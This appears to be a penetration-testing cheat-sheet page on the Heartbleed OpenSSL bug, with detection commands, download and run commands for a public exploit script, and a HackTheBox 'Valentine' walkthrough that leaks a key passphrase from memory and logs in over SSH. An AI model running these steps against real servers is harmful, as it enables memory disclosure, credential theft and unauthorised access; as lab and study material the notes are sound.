heartbleed

Basics

http://heartbleed.com/
Vulnerability in the popular OpenSSL cryptographic software library.
Allows anyone to read the memory of the systems protected by this vulnerable OpenSSL version.
Grabs a memory dump - Might find all kinds of goodies!!
"How the heartbleed bug works"
- https://xkcd.com/1354/
- Meg: Server are you still there? if so reply 'HAT' with 500 letters

Detection

> nmap --script vuln $IP
> sslyze --heartbleed $IP

Exploit

google: python heartbleed github

-----------
Download
https://gist.github.com/eelsivart/10174134#file-heartbleed-py-L8
wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
git clone https://gist.github.com/10174134.git

-----------
searchsploit -w heartbleed
https://exploit-db.com/exploits/32764

-----------
python heartbleed.py
python heartbleed.py -p 443 -n 10 $IP
./heartbleed.py $IP -n 500 -a output.txt    ..winner

-n 500  ..Number of times to connect/loop (1 = default)
-a output.txt

grep '=' output.txt
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==   ..valentineHTB

Example

valentineHTB - had a ssh key password entered on 'decode.php'
hype_key was hidden somewhere else on the site :)
We can grab the memory, decode the key, and ssh to the box

-----------
decode.php
aGVhcnxyz==                        ..found

-----------
echo 'aGVhcnxyz==' | base64 -d     ..mysecretkey
ssh -i hype_key hype@$IP           ..connect

PreviousFTP NextMetasploit

Last updated 1 year ago